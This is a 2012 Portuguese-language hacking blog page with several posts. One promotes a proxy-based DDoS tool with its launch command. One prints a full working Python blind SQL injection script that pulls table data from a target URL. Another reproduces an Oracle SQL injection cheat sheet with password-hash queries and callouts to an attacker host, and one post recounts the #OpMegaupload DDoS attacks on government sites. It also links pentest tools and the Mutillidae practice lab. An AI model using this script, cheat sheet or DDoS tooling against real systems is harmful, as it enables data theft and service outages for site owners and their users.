domingo, 19 de fevereiro de 2012

Barrelroll: A Simple Pycurl DDoS Tool!



Eu fico imaginando a integração de algumas ferramentas existentes no mercado para testar a capacidade de uma rede. Eu estou me referindo ao T50 + o Barrelroll. Essa última lançada há pouco tempo e desenvolvida em Python.

A Barrelroll realiza múltiplas conexões em um host utilizando múltiplos proxies.. Imaginem o estrago de uma junção com o T50 ?!

A utilização dessa ferramenta é bem simples. Vejam na linha de comando abaixo:

./barrelroll.py 127.0.0.1 localhost 50 < proxies/list1.txt

Vale lembrar que ambas ferramentas deverão se utilizadas de forma consciente...

Link Download: Barrelroll

Ref: http://blog.corujadeti.com.br/barrelroll-a-simple-pycurl-ddos-tool/

PHP Injection Scanner


É um pouco antigo já, mas quem sabe pode ser útil para alguém.
Esse Tool utiliza as técnicas de RFI e LFI 


Link Download: PHP Injection Scaner

Blind Twi Injection


 Esse é o Bind SQL Injection. Ao inves de fazer brute force manualmente, pode-se usar uma ferramenta para isso para facilitar.


#!/usr/bin/python

import urllib,sys

banner = """ 
------------------------------------
           Blind Twi Injection
------------------------------------
"""
print banner

if len(sys.argv) != 5:

   print "Usage: %s <url> <table> <column> <max-caracters>" % sys.argv[0]

   print "Ex: %s http://www.site.com/news.php?id=1 users password 7\n" % sys.argv[0]

   sys.exit(0)

url = sys.argv[1]

table = sys.argv[2]

column = sys.argv[3]

n = int(sys.argv[4])

def bsqli():

   print ("\n[+]Started\n")

   word = ""

   n1 = n + 1

   for n3 in range(1,n1):

      for i in range(97,127):

         f = urllib.urlopen(url+"+and+ascii(substring((select+concat("+column+")+from+"+table+"+limit+0,1),+"+str(n3)+",1))="+str(i))

         code3 = f.read()

         if (code3 == code):

            word = word+chr(i)

            break

   print "Result: " + word

f = urllib.urlopen(url+"+and+1=1--")

code = f.read()

f = urllib.urlopen(url+"and+1=0--")

code1 = f.read()

if (code != code1):

   print("Vulnerable!")

else:

   print("This website is not vulnerable!")

res = raw_input("Continue[y]: ")

if res == "y" or "Y":

   bsqli()

else:

   sys.exit()

Anonymous: A Grande Farsa. Será?


Como que uma ideologia se diz democrática quando ao mesmo tempo, propõe uma "Ditadura", e o extermínio de uma determinada classe? Não seria isso uma incoerência? Não sejam inocentes úteis nas mãos de "salvadores" não muito bem intencionados. Abram seus olhos!

quinta-feira, 16 de fevereiro de 2012

Localizador de IP


Clique na Figura Abaixo:

terça-feira, 7 de fevereiro de 2012

Oracle SQL Injection Cheat Sheet

Version:
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';

SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;

Comments

SELECT 1 FROM dual -- comment

-- NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name 'dual' when we're not actually selecting from a table.

Current User

SELECT USER FROM dual


List Users

SELECT username FROM all_users ORDER BY username;

SELECT name FROM sys.USER$; -- priv

List Password Hashes

SELECT name, password, astatus FROM sys.USER$ -- priv, <= 10g.  astatus tells you if acct is locked

SELECT name,spare4 FROM sys.USER$ -- priv, 11g

Password Cracker

checkpwd
quebrará o hashes DES-based da Oracle 8, 9 e 10

List Privileges

SELECT * FROM session_privs; -- current privs

SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

List DBA Accounts

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles


Current Database

SELECT global_name FROM global_name;

SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;

List Databases

SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)

-- Also query TNS listener for other databases.  See tnscmd (services | status).

List Columns

SELECT column_name FROM all_tab_columns WHERE TABLE_NAME = 'blah';

SELECT column_name FROM all_tab_columns WHERE TABLE_NAME = 'blah' AND owner = 'foo';

List Tables

SELECT TABLE_NAME FROM all_tables;

SELECT owner, TABLE_NAME FROM all_tables;

Find Tables From Column Name

SELECT owner, TABLE_NAME FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case


Select Nth Row

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- gets 9th row (rows numbered from 1)


Select Nth Char

SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'


Bitwise AND

SELECT bitand(6,2) FROM dual; -- returns 2

SELECT bitand(6,1) FROM dual; -- returns0

ASCII Value -> Char

SELECT chr(65) FROM dual; -- returns A


Char -> ASCII Value

SELECT ascii('A') FROM dual; -- returns 65


Casting

SELECT CAST(1 AS CHAR) FROM dual;

SELECT CAST('1' AS INT) FROM dual;

String Concatenation

SELECT 'A' || 'B' FROM dual; -- returns AB


If Statement

BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements


Case Statement

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1

SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2

Avoiding Quotes

SELECT chr(65) || chr(66) FROM dual; -- returns AB


Time Delay

BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT

SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse looks are slow
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered / slow
-- Veja também Consultas Queries para criar um time delay

Make DNS Requests

SELECT UTL_INADDR.get_host_address('google.com') FROM dual;

SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;

Command Execution

Java
pode ser usado para executar comandos se ele estiver instalado.
Extproc às vezes pode ser usado também.

Local File Access

UTL_FILE
às vezes pode ser usado. Verifique se o seguinte não é nulo:
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
Java pode ser usado para ler e gravar arquivos se for instalado (ele não está disponível no Oracle Express)

Hostname, IP Address

SELECT UTL_INADDR.get_host_name FROM dual;

SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames

Location of DB files

SELECT name FROM V$DATAFILE;


Default/System Databases

SYSTEM

SYSAUX

Fonte
: http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet

Extra:

IronWASP - Web application Advanced Security testing Platform

IronWASP (Iron Web application Advanced Security testing Platform) é um sistema open source para teste de vulnerabilidade em aplicativos web. Ele é projetado para ser customizável, na medida em que os usuários podem criar seus próprios scanners de segurança personalizados. Voltada tanto a usuários avançados em Python/Ruby com experiência scripting, com uma característica de ferramenta simples o suficiente para ser usado por iniciantes.
Baixe, descompacte e leia o README.txt para as instruções de uso.
Obs:
Requer .NET 2.0

Baixar:
http://ironwasp.org/download.html
Vídeos:
IronWASP (11 videos): Part 1 , Part 2 & Part 3 
              Plugins (8 videos): Part 1 , Part 2 & Part 3

quinta-feira, 2 de fevereiro de 2012

A guerra na internet voltou #OpMegaupload

 Poucos minutos depois de o site ser encerrado, e DOJ liberando sua declaração, Hacker's entraram em ação e começou a derrubar uma tonelada de sites - incluindo sites para o Departamento de Justiça, os EUA Escritório de Direitos Autorais, a Universal Music, a RIAA, a MPAA e um monte de outros sites.

 

                                                    Departamento de Justiça (Justice.gov)
Motion Picture Association of America (MPAA.org)
Universal Music (UniversalMusic.com)
Belga Anti-Pirataria Federation (Anti-piracy.be/nl /)
Recording Industry Association of America (RIAA.org)
Federal Bureau of Investigation (FBI.gov)
HADOPI lei site (HADOPI.fr)
EUA Escritório de Direitos Autorais (Copyright.gov)
Universal Music France (UniversalMusic.fr)
O senador Christopher Dodd (ChrisDodd.com)
Vivendi França (Vivendi.fr)
A Casa Branca (Whitehouse.gov)
IMC (BMI.com)
Warner Music Group (WMG.com)

Hacker's lança um grande ataque ao governo paralisante e sites da indústria da música. Hacktivistas estão travando um ataque ao site da Casa Branca depois de ter conseguido quebrar os sites para o Departamento de Justiça, Universal Music Group, RIAA e Motion Picture Association of America.

Muitos membros do Congresso mudou sua posição sobre a controversa Lei da Pirataria Parar Online, ou SOPA, o ataque sobre Megaupload quinta-feira provou que os federais não precisam SOPA sua legislação ou irmã, PIPA, a fim de representar um golpe na Web .

quarta-feira, 1 de fevereiro de 2012

FatCat – automatizando SQL Injection


SQL Injection é um dos ataques mais praticados contra aplicações Web. Hackers e crackers buscam falhas no código de aplicações web que dão acesso à base de dados.
A tarefa de buscar essas falhas e explorá-las se tornou mais fácil nos últimos anos devido a ferramentas como SQL Map e o FatCat, ferramenta essa que foi divulgada ao público em 9 de janeiro, quer dizer, há poucos dias.
FatCat automatiza todo o processo de busca e exploração em aplicações Web, tendo também as seguintes features:
  • Normal SQL Injection
  • Double Query SQL Injection
  • WAF bypass
  • Cookie Header passing
  • Load File
  • Generating XSS from SQL
Video da ferramenta em execução: http://dl.dropbox.com/u/18007092/FatCat.swf


Ref: http://blog.corujadeti.com.br

Técnicas de Pentest com Multillidae 2.1.13



Mutillidae é um aplicativo gratuito web open source, fornecido para permitir que profissionais de segurança realizem técnicas de pen-test e possam “cortar” uma aplicação web. O utilitário pode ser instalado em sistemas Linux, Windows XP e Windows 7, utilizando XAMMP, tornando fácil a vida daqueles os usuários que não quiserem instalar ou administrar seu próprio webserver.

Além disso, Mutillidae contém um grande número de vulnerabilidades e dicas para ajudar o usuário a explorá-las, oferecendo um ambiente bastante fácil de usar, auxiliando no trabalho dos hackers e deliberadamente concebido para ser utilizado como um “hack” de laboratório para os profissionais e entusiastas da área de segurança, laboratórios de sala de aula, e como uma ferramenta que tem como meta a avaliação de vulnerabilidades.

  • Adicionado Mutillidae YouTube link de canal ao menu
  • Corrigidos alguns links do menu para que abra em uma nova janela
  • Adicionado uma dica para a página framer.php informando ao usuário para tentar mudar o nível de segurança.
  • Adicionada uma nova página chamada anti-framing protection.inc. A página mostra os desenvolvedores de como implementar de estilo antigo código javascript rebentando frame. Este isn "t usado para novos navegadores, porque x-frame-options suplantou o código rebentando frame, mas ainda existem muitos navegadores antigos rodando em quiosques e tal.
  • Adicionado mais documentação no Ovo de Páscoa arquivo scripts de teste Mutillidae
  • Adicionado Kevin Johnson como usuário padrão honorário
  • Adicionado mais valores ao banco de dados padrão para fazer injeção de SQL mais interessante
  • Reduziu o tamanho da espessura de cabeçalho para dar mais espaço
  • Melhorou muito SQL Injection tutorial ou pelo menos digitado muito mais coisas
  • Atualizado o arquivo de Ovo de Páscoa com mais dicas e truques , principalmente na injeção SQL

Download Mutillidae 2.1.13:

Mutillidae 2.1.13 - Mutillidae-2.1.13.zip - http://www.irongeek.com/mutillidae/mutillidae-2.1.13.zip 

Ref: http://www.pentestit.com/
 

SECURITY MASTER Copyright © 2011 -- Template created by Security Master -- Powered by Blogger